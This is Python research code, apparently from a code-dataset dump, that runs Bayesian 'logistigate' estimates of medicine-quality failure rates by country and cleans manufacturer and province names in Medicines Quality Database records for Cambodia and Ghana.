fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_GHA_antimalarial)
# Run with Kenya provinces
dataTblDict_KEN = util.testresultsfiletotable('MQDfiles/MQD_KENYA.csv')
countryMean = np.sum(dataTblDict_KEN['Y']) / np.sum(dataTblDict_KEN['N'])
dataTblDict_KEN.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_KEN = lg.runlogistigate(dataTblDict_KEN)
util.plotPostSamples(logistigateDict_KEN)
util.printEstimates(logistigateDict_KEN)
# Run with Laos provinces
dataTblDict_LAO = util.testresultsfiletotable('MQDfiles/MQD_LAOS.csv')
countryMean = np.sum(dataTblDict_LAO['Y']) / np.sum(dataTblDict_LAO['N'])
dataTblDict_LAO.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_LAO = lg.runlogistigate(dataTblDict_LAO)
util.plotPostSamples(logistigateDict_LAO)
util.printEstimates(logistigateDict_LAO)
# Run with Mozambique provinces
dataTblDict_MOZ = util.testresultsfiletotable('MQDfiles/MQD_MOZAMBIQUE.csv')
countryMean = np.sum(dataTblDict_MOZ['Y']) / np.sum(dataTblDict_MOZ['N'])
dataTblDict_MOZ.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_MOZ = lg.runlogistigate(dataTblDict_MOZ)
util.plotPostSamples(logistigateDict_MOZ)
util.printEstimates(logistigateDict_MOZ)
# Run with Nigeria provinces
dataTblDict_NIG = util.testresultsfiletotable('MQDfiles/MQD_NIGERIA.csv')
countryMean = np.sum(dataTblDict_NIG['Y']) / np.sum(dataTblDict_NIG['N'])
dataTblDict_NIG.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_NIG = lg.runlogistigate(dataTblDict_NIG)
util.plotPostSamples(logistigateDict_NIG)
util.printEstimates(logistigateDict_NIG)
# Run with Peru provinces
dataTblDict_PER = util.testresultsfiletotable('MQDfiles/MQD_PERU.csv')
countryMean = np.sum(dataTblDict_PER['Y']) / np.sum(dataTblDict_PER['N'])
dataTblDict_PER.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER = lg.runlogistigate(dataTblDict_PER)
numPeruImps_half = int(np.floor(logistigateDict_PER['importerNum']/2))
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(0,numPeruImps_half).tolist(), subTitleStr=['\nPeru - 1st Half', '\nPeru'])
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half,logistigateDict_PER['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half', '\nPeru'])
util.printEstimates(logistigateDict_PER)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_PER['importerNum'] + logistigateDict_PER['outletNum']
sampMedians = [np.median(logistigateDict_PER['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PER['importerNum']]) if x > 0.4]
highImporterInds = [highImporterInds[i] for i in [3,6,7,8,9,12,13,16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PER['importerNum']:]) if x > 0.12]
util.plotPostSamples(logistigateDict_PER, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nPeru - Subset', '\nPeru - Subset'])
util.printEstimates(logistigateDict_PER, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Peru provinces filtered for outlet-type samples
dataTblDict_PER_filt = util.testresultsfiletotable('MQDfiles/MQD_PERU_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PER_filt['Y']) / np.sum(dataTblDict_PER_filt['N'])
dataTblDict_PER_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_filt = lg.runlogistigate(dataTblDict_PER_filt)
numPeruImps_half = int(np.floor(logistigateDict_PER_filt['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(0, numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (filtered)', '\nPeru (filtered)'])
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_filt['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (filtered)', '\nPeru (filtered)'])
util.printEstimates(logistigateDict_PER_filt)
# Run with Peru provinces filtered for antibiotics
dataTblDict_PER_antibiotics = util.testresultsfiletotable('MQDfiles/MQD_PERU_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_PER_antibiotics['Y']) / np.sum(dataTblDict_PER_antibiotics['N'])
dataTblDict_PER_antibiotics.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_antibiotics = lg.runlogistigate(dataTblDict_PER_antibiotics)
numPeruImps_half = int(np.floor(logistigateDict_PER_antibiotics['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_antibiotics['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.printEstimates(logistigateDict_PER_antibiotics)
# Run with Philippines provinces
dataTblDict_PHI = util.testresultsfiletotable(dataDict['dataTbl_PHI'], csvName=False)
#dataTblDict_PHI = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES.csv')
countryMean = np.sum(dataTblDict_PHI['Y']) / np.sum(dataTblDict_PHI['N'])
dataTblDict_PHI.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI = lg.runlogistigate(dataTblDict_PHI)
util.plotPostSamples(logistigateDict_PHI,plotType='int90',subTitleStr=['\nPhilippines','\nPhilippines'])
util.printEstimates(logistigateDict_PHI)
# Plot importers subset where median sample is above 0.1
totalEntities = logistigateDict_PHI['importerNum'] + logistigateDict_PHI['outletNum']
sampMedians = [np.median(logistigateDict_PHI['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PHI['importerNum']]) if x > 0.1]
#highImporterInds = [highImporterInds[i] for i in
# [3, 6, 7, 8, 9, 12, 13, 16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PHI['importerNum']:]) if x > 0.1]
#util.plotPostSamples(logistigateDict_PHI, importerIndsSubset=highImporterInds,
# outletIndsSubset=highOutletInds,
# subTitleStr=['\nPhilippines - Subset', '\nPhilippines - Subset'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_PHI['importerNum'], logistigateDict_PHI['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_PHI['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_PHI['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_PHI['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_PHI)
util.printEstimates(logistigateDict_PHI, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Philippines provinces filtered for outlet-type samples
dataTblDict_PHI_filt = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PHI_filt['Y']) / np.sum(dataTblDict_PHI_filt['N'])
dataTblDict_PHI_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI_filt = lg.runlogistigate(dataTblDict_PHI_filt)
util.plotPostSamples(logistigateDict_PHI_filt, plotType='int90', subTitleStr=['\nPhilippines (filtered)', '\nPhilippines (filtered)'])
util.printEstimates(logistigateDict_PHI_filt)
# Run with Thailand provinces
dataTblDict_THA = util.testresultsfiletotable('MQDfiles/MQD_THAILAND.csv')
countryMean = np.sum(dataTblDict_THA['Y']) / np.sum(dataTblDict_THA['N'])
dataTblDict_THA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_THA = lg.runlogistigate(dataTblDict_THA)
util.plotPostSamples(logistigateDict_THA)
util.printEstimates(logistigateDict_THA)
# Run with Viet Nam provinces
dataTblDict_VIE = util.testresultsfiletotable('MQDfiles/MQD_VIETNAM.csv')
countryMean = np.sum(dataTblDict_VIE['Y']) / np.sum(dataTblDict_VIE['N'])
dataTblDict_VIE.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_VIE = lg.runlogistigate(dataTblDict_VIE)
util.plotPostSamples(logistigateDict_VIE)
util.printEstimates(logistigateDict_VIE)
return
| 62.53666 | 140 | 0.650975 | # Workaround for the 'methods' file not being able to locate the 'mcmcsamplers' folder for importing
# Path bootstrap: make the vendored 'logistigate' submodule importable no matter
# which working directory this script is launched from.
import sys
import os
# Absolute directory of this script (expanduser + realpath resolve '~' and symlinks).
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
# Put the submodule's package directory on sys.path ...
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate')))
# ... and its 'mcmcsamplers' subfolder as well — presumably so the 'methods'
# module can resolve its samplers directly; TODO confirm against 'methods' imports.
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate', 'mcmcsamplers')))
import logistigate.logistigate.utilities as util  # Pull from the submodule "develop" branch
import logistigate.logistigate.methods as methods  # Pull from the submodule "develop" branch
import logistigate.logistigate.lg as lg  # Pull from the submodule "develop" branch
def cleanMQD():
'''
Script that cleans up raw Medicines Quality Database data for use in logistigate.
It reads in a CSV file with columns 'Country,' 'Province,' 'Therapeutic Indication',
'Manufacturer,' 'Facility Type', 'Date Sample Collected', 'Final Test Result,' and
'Type of Test', and returns a dictionary of objects to be formatted for use with logistigate.
'''
# Read in the raw database file
import pandas as pd
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
filesPath = os.path.join(SCRIPT_DIR, '../MQDfiles')
MQD_df = pd.read_csv(os.path.join(filesPath,'MQD_ALL_CSV.csv')) # Main raw database file
# Get data particular to each country of interest
MQD_df_CAM = MQD_df[MQD_df['Country'] == 'Cambodia'].copy()
MQD_df_GHA = MQD_df[MQD_df['Country'] == 'Ghana'].copy()
MQD_df_PHI = MQD_df[MQD_df['Country'] == 'Philippines'].copy()
# Consolidate typos or seemingly identical entries in significant categories
# Cambodia
# Province
MQD_df_CAM.loc[
(MQD_df_CAM.Province == 'Ratanakiri') | (MQD_df_CAM.Province == 'Rattanakiri'), 'Province'] = 'Ratanakiri'
MQD_df_CAM.loc[
(MQD_df_CAM.Province == 'Steung Treng') | (MQD_df_CAM.Province == 'Stung Treng'), 'Province'] = 'Stung Treng'
# Manufacturer
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Acdhon Co., Ltd') | (MQD_df_CAM.Manufacturer == 'Acdhon Company Ltd'),
'Manufacturer'] = 'Acdhon Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Alembic Limited') | (MQD_df_CAM.Manufacturer == 'Alembic Pharmaceuticals Ltd'),
'Manufacturer'] = 'Alembic Limited'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'ALICE PHARMA PVT LTD') | (MQD_df_CAM.Manufacturer == 'Alice Pharma Pvt.Ltd')
| (MQD_df_CAM.Manufacturer == 'Alice Pharmaceuticals'), 'Manufacturer'] = 'Alice Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Atoz Pharmaceutical Pvt.Ltd') | (MQD_df_CAM.Manufacturer == 'Atoz Pharmaceuticals Ltd'),
'Manufacturer'] = 'Atoz Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Aurobindo Pharma LTD') | (MQD_df_CAM.Manufacturer == 'Aurobindo Pharma Ltd.')
| (MQD_df_CAM.Manufacturer == 'Aurobindo Pharmaceuticals Ltd'), 'Manufacturer'] = 'Aurobindo'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Aventis') | (MQD_df_CAM.Manufacturer == 'Aventis Pharma Specialite'),
'Manufacturer'] = 'Aventis'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Bright Future Laboratories') | (MQD_df_CAM.Manufacturer == 'Bright Future Pharma'),
'Manufacturer'] = 'Bright Future Laboratories'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Burapha') | (MQD_df_CAM.Manufacturer == 'Burapha Dispensary Co, Ltd'),
'Manufacturer'] = 'Burapha'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'CHANKIT') | (MQD_df_CAM.Manufacturer == 'Chankit Trading Ltd')
| (MQD_df_CAM.Manufacturer == 'Chankit trading Ltd, Part'),
'Manufacturer'] = 'Chankit Trading Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratoire Co., LTD') | (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratories Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratory Company Ltd'),
'Manufacturer'] = 'Chea Chamnan Laboratory Company Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Cipla Ltd.') | (MQD_df_CAM.Manufacturer == 'Cipla Ltd'),
'Manufacturer'] = 'Cipla Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT STOCK CORP')
| (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT_stock corp')
| (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMPORT EXPORT JOINT STOCK CORP')
| (MQD_df_CAM.Manufacturer == 'Domesco'),
'Manufacturer'] = 'Domesco'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Emcure Pharmaceutical') | (MQD_df_CAM.Manufacturer == 'Emcure'),
'Manufacturer'] = 'Emcure'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Eurolife Healthcare Pvt Ltd') | (MQD_df_CAM.Manufacturer == 'Eurolife'),
'Manufacturer'] = 'Eurolife'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceutical Limited') | (MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceuticals Ltd'),
'Manufacturer'] = 'Flamingo Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Global Pharma Health care PVT-LTD')
| (MQD_df_CAM.Manufacturer == 'GlobalPharma Healthcare Pvt-Ltd')
| (MQD_df_CAM.Manufacturer == 'Global Pharma'),
'Manufacturer'] = 'Global Pharma'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals Ltd.') | (MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals'),
'Manufacturer'] = 'Gracure Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceutical Company Ltd') | (MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceuticals Ltd'),
'Manufacturer'] = 'Il Dong Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Khandelwal Laboratories Ltd')
| (MQD_df_CAM.Manufacturer == 'Khandewal Lab')
| (MQD_df_CAM.Manufacturer == 'Khandelwal'),
'Manufacturer'] = 'Khandelwal'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Laboratories EPHAC Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'EPHAC Laboratories Ltd'),
'Manufacturer'] = 'Laboratories EPHAC Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Lyka Laboratories Ltd')
| (MQD_df_CAM.Manufacturer == 'Lyka Labs Limited.')
| (MQD_df_CAM.Manufacturer == 'Lyka Labs'),
'Manufacturer'] = 'Lyka Labs'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Marksans Pharmaceuticals Ltd') | (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.')
| (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.,'),
'Manufacturer'] = 'Marksans Pharma Ltd.'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'MASALAB') | (MQD_df_CAM.Manufacturer == 'Masa Lab Co., Ltd'),
'Manufacturer'] = 'Masa Lab Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enterprise')
| (MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enteprise'),
'Manufacturer'] = 'Medical Supply Pharmaceutical Enterprise'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Medopharm Pvt. Ltd.')
| (MQD_df_CAM.Manufacturer == 'Medopharm'),
'Manufacturer'] = 'Medopharm'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Micro Laboratories Ltd') | (MQD_df_CAM.Manufacturer == 'MICRO LAB LIMITED')
| (MQD_df_CAM.Manufacturer == 'Micro Labs Ltd') | (MQD_df_CAM.Manufacturer == 'Microlabs Limited'),
'Manufacturer'] = 'Microlabs'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Millimed Co., Ltd Thailand')
| (MQD_df_CAM.Manufacturer == 'Millimed'),
'Manufacturer'] = 'Millimed'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Orchid Health Care') | (MQD_df_CAM.Manufacturer == 'Orchid Health'),
'Manufacturer'] = 'Orchid Health'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratory Co., LTD') | (MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratories'),
'Manufacturer'] = 'Osoth Inter Laboratories'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'PHARMASANT LABORATORIES Co.,LTD') | (MQD_df_CAM.Manufacturer == 'Pharmasant Laboratories Co., Ltd'),
'Manufacturer'] = 'Pharmasant Laboratories Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Plethico Pharmaceuticals, Ltd')
| (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceuticals Ltd')
| (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceutical Ltd')
| (MQD_df_CAM.Manufacturer == 'Plethico'),
'Manufacturer'] = 'Plethico'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'PPM Laboratory') | (MQD_df_CAM.Manufacturer == 'PPM')
| (MQD_df_CAM.Manufacturer == 'Pharma Product Manufacturing'),
'Manufacturer'] = 'PPM'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Ranbaxy Laboratories Limited.')
| (MQD_df_CAM.Manufacturer == 'Ranbaxy Pharmaceuticals'),
'Manufacturer'] = 'Ranbaxy Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Shijiazhuang Pharma Group Zhongnuo Pharmaceutical [Shijiazhuang] Co.,LTD')
| (MQD_df_CAM.Manufacturer == 'Shijiazhuang Pharmaceutical Group Ltd'),
'Manufacturer'] = 'Shijiazhuang Pharmaceutical Group Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Sanofi-Aventis Vietnam') | (MQD_df_CAM.Manufacturer == 'Sanofi Aventis'),
'Manufacturer'] = 'Sanofi Aventis'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Stada Vietnam Joint Venture Co., Ltd.') | (MQD_df_CAM.Manufacturer == 'Stada Vietnam Joint Venture'),
'Manufacturer'] = 'Stada Vietnam Joint Venture'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Shandong Reyoung Pharmaceutical Co., Ltd') | (
MQD_df_CAM.Manufacturer == 'Shandong Reyoung Pharmaceuticals Ltd'),
'Manufacturer'] = 'Shandong Reyoung Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'T Man Pharma Ltd. Part.')
| (MQD_df_CAM.Manufacturer == 'T-MAN Pharma Ltd., Part')
| (MQD_df_CAM.Manufacturer == 'T-Man Pharmaceuticals Ltd'),
'Manufacturer'] = 'T-Man Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Umedica Laboratories PVT. LTD.')
| (MQD_df_CAM.Manufacturer == 'Umedica Laboratories PVT. Ltd')
| (MQD_df_CAM.Manufacturer == 'Umedica Laboratories Pvt Ltd')
| (MQD_df_CAM.Manufacturer == 'Umedica'),
'Manufacturer'] = 'Umedica'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Utopian Co,.LTD') | (MQD_df_CAM.Manufacturer == 'Utopian Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Utopian Company Ltd'),
'Manufacturer'] = 'Utopian Company Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Vesco Pharmaceutical Ltd.,Part')
| (MQD_df_CAM.Manufacturer == 'Vesco Pharmaceutical Ltd Part'),
'Manufacturer'] = 'Vesco Pharmaceutical Ltd Part'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Yanzhou Xier Kangtai Pharmaceutical Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Yanzhou Xier Kangtai Pharm'),
'Manufacturer'] = 'Yanzhou Xier Kangtai Pharm'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Zhangjiakou DongFang pharmaceutical Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Zhangjiakou Dongfang Phamaceutical'),
'Manufacturer'] = 'Zhangjiakou Dongfang Phamaceutical'
# Ghana
# Province
MQD_df_GHA.loc[
(MQD_df_GHA.Province == 'Northern') | (MQD_df_GHA.Province == 'Northern Region')
| (MQD_df_GHA.Province == 'Northern Region, Northern Region'),
'Province'] = 'Northern'
MQD_df_GHA.loc[
(MQD_df_GHA.Province == 'Western (Ghana)'),
'Province'] = 'Western'
# Manufacturer
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Ajanta Pharma Ltd') | (MQD_df_GHA.Manufacturer == 'Ajanta Pharma Ltd.'),
'Manufacturer'] = 'Ajanta Pharma Ltd.'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Ally Pharma Options Pvt Ltd.') | (MQD_df_GHA.Manufacturer == 'Ally Pharma Options Pvt. Ltd'),
'Manufacturer'] = 'Ally Pharma Options Pvt. Ltd'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Bliss GVS Pharma Ltd') | (MQD_df_GHA.Manufacturer == 'Bliss GVS Pharmaceuticals Ltd.'),
'Manufacturer'] = 'Bliss GVS Pharma Ltd'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Cipla Ltd. India') | (MQD_df_GHA.Manufacturer == 'Cipla Ltd'),
'Manufacturer'] = 'Cipla Ltd'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Danadams Pharmaceutical Industry Limited')
| (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceutical Industry, Ltd.')
| (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceuticals Industry Limited'),
'Manufacturer'] = 'Danadams'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Company Ltd.')
| (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Co. Ltd')
| (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Co., Ltd'),
'Manufacturer'] = 'Guilin'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Kinapharma Limited') | (MQD_df_GHA.Manufacturer == 'Kinapharma Ltd'),
'Manufacturer'] = 'Kinapharma'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Maphar Laboratories') | (MQD_df_GHA.Manufacturer == 'Maphar'),
'Manufacturer'] = 'Maphar'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Novartis Pharmaceutical Corporation')
| (MQD_df_GHA.Manufacturer == 'Novartis Pharmaceuticals Corporation'),
'Manufacturer'] = 'Novartis'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Pharmanova Limited')
| (MQD_df_GHA.Manufacturer == 'Pharmanova Ltd'),
'Manufacturer'] = 'Pharmanova'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Phyto-Riker (Gihoc) Pharmaceuticals Ltd')
| (MQD_df_GHA.Manufacturer == 'Phyto-Riker (Gihoc) Pharmaceuticals, Ltd.'),
